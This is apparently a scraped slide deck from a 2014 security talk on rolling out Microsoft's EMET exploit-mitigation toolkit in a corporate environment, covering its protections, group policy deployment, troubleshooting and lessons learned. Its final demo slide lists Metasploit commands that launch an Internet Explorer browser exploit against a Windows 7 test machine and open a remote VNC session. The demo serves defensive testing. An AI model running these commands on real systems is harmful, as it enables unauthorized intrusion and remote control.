Like what you hear? Tweet it using: #Sec360...

Click here to load reader

  • date post

  • Category


  • view

  • download


Embed Size (px)

Transcript of Like what you hear? Tweet it using: #Sec360...

  • Like what you hear? Tweet it using: #Sec360 5/13/2014


    Technical details


    Rolling out in a Corporate Environment


    Lessons Learned

    Tips for Maximum security settings


    Trademarks owned by their respective owners

  • WHY RUN EMET? Do you have top notch anti-malware?

    Are your PCs still being exploited? § No Anti-malware product is 100% effective § Zero-day exploits for IE / Flash / Adobe Reader / Java / etc…

    Would you like to improve your odds?


    Blocks “zero-day” malware exploits

    Supplements existing anti-malware

    Supported by Microsoft

    Uses group policy

    Minimal overhead

    But wait, there’s more…

    It’s FREE!!!

  • OK, WHAT IS EMET EMET: Enhanced Mitigation Experience Toolkit

    A free software package from Microsoft § Available since 2009 / officially supported since 2011 § Current version is 4.1 (& 5.0 preview)

    Blocks memory corruption /buffer overflow exploits § Example: it randomizes memory locations

    Low overhead: Uses the Application Compatibility Framework, rather than running as a program § No need to recompile applications

    Install on every workstation

  • WHY RUN EMET? Because Microsoft recommends it:

    4/26/2014 - Microsoft KB2963983 IE Vulnerability – “Workarounds […] Deploy the Enhanced Mitigation Experience Toolkit”

    3/24/2014 – Microsoft SRD2953095 Word Vulnerability – “our tests showed that EMET default configuration can block the exploits seen in the wild.”

    3/11/2014 – Microsoft MS14-012 IE Vulnerability – “Does EMET help mitigate attacks that could attempt to exploit these vulnerabilities? Yes.”

    7/28/2010 – Microsoft FF859539 IE Aurora Vulnerability – “EMET can help prevent successful exploitation on systems lacking the update.”

    … and it blocks many more for Flash / Adobe Reader / Java / etc…

  • WHERE IT WORKS BEST Workstations typically get infected in two ways:

    1.  Workstation has vulnerable software § E.g. Unpatched/zero-day Adobe, Java, Office, Browser Plug-ins § Users visit automated exploit web site, or open bad email document

    -> Install EMET

    2.  Users get tricked into running bad software §  Payroll.exe,,

    -> Train Users, EMET less effective

    * In addition to other mitigations such as anti-malware

  • TECHNICAL: PROTECTION OVERVIEW Three Types of Protection:

    1.  System Wide § Programs can be coded to opt-in or opt-out 2.  Per-Program § Enforces protection on specific programs 3.  Per-Web-Site § Alerts users to fraudulent SSL/TLS certificates

  • TECHNICAL: 1. SYSTEM-WIDE 1. System Wide Protections:

    DEP - Data Execution Prevention § Marks data (heap/stack) memory as non-executable § Requires support by the CPU (Intel=XD, AMD=NX) SEHOP – Exception Handling § OS walks exception chain to validate before using it ASLR – Address Randomization § Use different memory locations each boot

  • TECHNICAL: 1. SYSTEM-WIDE 1. System-Wide Protection Options: DEP / SEHOP/ASLR

    Always On – All programs will use

    Opt-Out – On except if program is written to opt-out

    Opt-In – Off except if program is written to opt-in

    Disabled – No programs will use

    Opt-In vs. Opt-Out depends on risk tolerance/resources

    Opt-In is the Microsoft recommendation § Less protection, but less compatibility issues

  • TECHNICAL: 2. PER-PROGRAM 2. Per-program Protection Options:

    Memory Protections: § DEP / Bottom-Up ASLR / Mandatory ASLR / Heap Spray (blocks

    common locations) / Null Page Return Oriented Programming (ROP): §  Load Library checks (no UNC DLL calls)/ Memory protection checks

    (disallow stack executable) / Caller Checks (critical functions only via “call” not “return”) / Stack Pivot (detect if stack pivoted)/ Simulate execution flow (detect ROP gadgets)

    Other: §  SEHOP / EAF (Export Address table Filtering - blocks API address

    lookup) /ASR (Attack Surface Reduction in v5.0, blocks specific plugins)

    Note: Any protection applied to a browser protects all its plug-ins too

  • TECHNICAL: 3. CERTIFICATE TRUST 3. Per-web-site (v4): Certificate Trust Pinning  Deters an attacker from using a compromised certificate vendor to

    intercept traffic (DigiNotar/Google) in IE § E.g. can only use DigiCert/Equifax/

    GeoTrust/Thawte/VeriSign certs § Config: MS / Yahoo / Skype / Twitter /Facebook § Might require maintenance with non-MS entries § Can specify expiration date, allow same country, etc.

    Only warns users, doesn’t block

    Not configurable by group policy



    Certificate Trust Pinning

    Certificate Authority must be: DigiCert/Equifax/GeoTrust/ Thawte/VeriSign

    E.g. but not DigiNotar


    Install Microsoft .Net 4.0 (& KB 2790907 on Win 8/2012) Download EMET from

    Install §  It will ask if you want Recommended Settings §  If no configuration is done, EMET doesn’t protect



    Start GUI

    Settings §  System-Wide § Always On / App Opt-Out / App Opt-In / Disabled

    § Per-program § v3 / ROP / Mitigation Settings § Manually Adding

    § Web Certificate CA Pinning

  • …TESTING ON A PC Start up the GUI:

    Start Menu -> EMET -> EMET GUI

    Sample Test Settings:

    DEP: Opt In

    SEHOP: Opt In

    ASLR: Opt In

    Pinning: Enabled

  • …TESTING ON A PC Import per-Application & Cert Pinning Settings:

    Import -> Popular § Popular has more than


    Import -> CertTrust § Contains SSL/TLS certificate

    pinning rules for a few web sites

  • ROLLING OUT: PREP Download EMET (& .Net 4) §

    Extract Group Policy ADM* files §  msiexec /a "EMET Setup.msi" /qb TARGETDIR="c:\temp“

    §  (or copy from the EMET directory if EMET is already installed)

    Install Group Policy ADM* files §  Only needed on machines that will modify group policy §  Copy EMET.admx and EMET.adml in c:\temp\group policy files to \Windows

    \PolicyDefinitions (admx), \Windows\PolicyDefinitions\en-US (adml) §  Note: ADM* files different for each EMET version – use current ones


    Note: Create a test OU container for each department / drag and drop PC


    Note: Create a Group Policy Object, then link to each Test OU container


    Note: IE, Popular, and Recommended Software are not similar


    Include a shutdown script to apply the group policy: EMET_Conf --refresh

  • ROLLING OUT: SOFTWARE Roll out .Net 4.0 (& KB 2790907 on Win 8/2012)

    Roll out EMET using Group Policy or other method

  • TROUBLESHOOTING EMET notification: Popup Window

    OS Application log: § Office Plug-ins

    also produce an Application Error, search disk for the module

  • EMET V4 KNOWN ISSUES Group Policy settings don’t display properly in EMET GUI § Commands that will display them:

    emet-conf --list reg query HKLM\Software\Policies\Microsoft\EMET


    Certificate Trust Pinning limitations: § EMET Group Policy doesn’t contain those settings § Not available for the “Modern” IE app in Windows 8

    Review the included EMET User’s Guide and the EMET web forum for additional caveats

  • LESSONS LEARNED 1.  DEP breaks legacy applications § Roll out EMET to enterprise in phases §  Set the system-wide DEP: Opt-in, not Always-on § E.g. breaks end-of-life versions of Crystal Reports

    § Can individually configure workstations to opt-out of DEP for a specific application if you set DEP to Opt-in § Computer Properties / Advanced /Performance / DEP

    § Can use the free Microsoft Application Compatibility Toolkit to create a “shim” to roll out for the application to opt-out of 32-bit DEP § Compatibility Fix setting: “Disable NX”

  • LESSONS LEARNED 2.  Apply Group Policy settings before installing §  Settings didn’t always apply afterwards § Can get the settings to apply by adding a Group Policy shutdown

    script to run “emet_conf --refresh”

    3.  Uninstalling EMET doesn’t revert system-wide changes (DEP) § Revert system-wide changes then uninstall § Tools - Windows 7: bcdedit § Possible BitLocker issue with DEP changes

    4.  IE developers may need EAF disabled for IE, WinZip may need update for Outlook plugin compatibility

  • LESSONS LEARNED: THE GOOD POINTS 5.  Office/IE issues only starting/closing application § A non-compatible add-in, one user a week issue § Users claim no impact on them § Yes, seriously – I asked twice

    6.  Fun to get notified if logging workstations centrally § Malware tends to give

    multiple EMET alerts

  • TIPS FOR EXTRA SECURITY Microsoft’s recommendation for Windows 7: §  “Opt-in” for System-wide settings §  “Recommended Software” (IE/Office/Adobe/Java) for Per-application settings

    A better recommendation: §  Add “Popular Software” for Per-application settings §  Adds other applications such as Firefox and Chrome web browsers §  Big bang for the buck with minimal issues – DO IT!

    Maximum settings: Not a recommendation with legacy software §  “Opt-out” for System-wide settings (“Always On” won’t allow fixes to work) §  Breaks DEP with 32-bit legacy applications – Possibly not worth extra effort

    §  Create and deploy “shims” to fix the applications

  • REFERENCES Microsoft EMET Homepage § §  Download link has the User Guide

    EMET Support Forum §

    Microsoft Videos §  Tech: § Non-Tech: §  EMET 4.1/5.0 TP:


    Testing EMET using Metasploit w/ Armitage GUI §  Systems:

    § Windows 7 § Metasploit /Armitage on Kali 1.0 (~BackTrack)

    § Msfupdate, Kali/System/Metasploit/Start, Kali/Exploit/Net/Armitage §  Exploit:

    §  (Kali) use exploit/windows/browser/ms11_003_ie_css_import §  set SRVPORT=80 /set URIPATH=funny §  exploit –j

    §  (Win7) Browse to http://server/funny §  (Kali/Console) sessions / session -i 1 / run vnc

  • QUESTIONS? Contact:

    Chris Covington, CISSP

    [email protected]